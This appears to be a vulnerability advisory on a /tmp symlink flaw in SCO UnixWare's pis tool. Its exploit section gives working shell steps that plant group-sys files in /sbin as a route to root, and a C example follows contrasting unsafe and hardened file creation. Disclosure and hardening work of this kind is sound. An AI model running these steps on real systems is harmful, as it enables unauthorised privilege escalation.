`Greetings,
OVERVIEW
A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any
user to create arbitrary files with group "sys" privileges. A full root
compromise is then trivial.
BACKGROUND
As usual, I've only tested UnixWare 7.1.
DETAILS
By creating a symlink from /tmp/pisdata to any sys-owned file, we can
overwrite that file with ps output. If we point the symlink at a
nonexistent file in a directory which we can write to (such as, say,
/sbin/ls), pis will create this file mode 666 owned by us, group of sys.
This is a fairly simple compromise. /sbin is writable by group sys. We
can create files in /sbin owned by us. And root's default $PATH starts
with /sbin.
EXPLOIT
bash-2.02$ ls -dal /sbin
drwxrwxr-x 2 root sys 3072 Dec 28 08:18 /sbin
bash-2.02$ ln -s /sbin/xnec /tmp/pisdata
bash-2.02$ pis
<program output>
bash-2.02$ ls -la /sbin/xnec
-rw-rw-rw- 1 xnec sys 5896 Dec 28 08:28 /sbin/xnec
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
`
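The root cause described in the advisory is a privileged program opening a predictable name in /tmp and following whatever symlink is there. The C sketch below is an added example, not code from the advisory or from pis (whose source is not shown on the page): it contrasts that open pattern with an exclusive, no-follow create. The function names and the scratch directory under /tmp are assumptions made for the demonstration.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* for mkdtemp, symlink, O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes: fixed name, symlinks followed, mode 0666. */
static int write_following_links(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if anything already sits at the
 * path, including a dangling symlink; O_NOFOLLOW refuses a final-component
 * link; mode 0600 keeps the file private to its owner. */
static int write_exclusive(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Constructed scenario: scratch dir with pisdata -> target (target absent).
 * Returns 1 if the writer created the link target, 0 if not, -1 on setup error. */
static int target_created_by(int (*writer)(const char *, const char *)) {
    char dir[] = "/tmp/symdemoXXXXXX", link[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link, sizeof link, "%s/pisdata", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, link) != 0) { rmdir(dir); return -1; }
    writer(link, "ps output\n");
    int created = (stat(target, &st) == 0);
    unlink(target); unlink(link); rmdir(dir);
    return created;
}

int main(void) {
    printf("following links: target created = %d\n", target_created_by(write_following_links));
    printf("exclusive open:  target created = %d\n", target_created_by(write_exclusive));
    return 0;
}
```

In practice a program like this should also avoid the fixed name altogether, for example by using mkstemp() or a directory only it can write to.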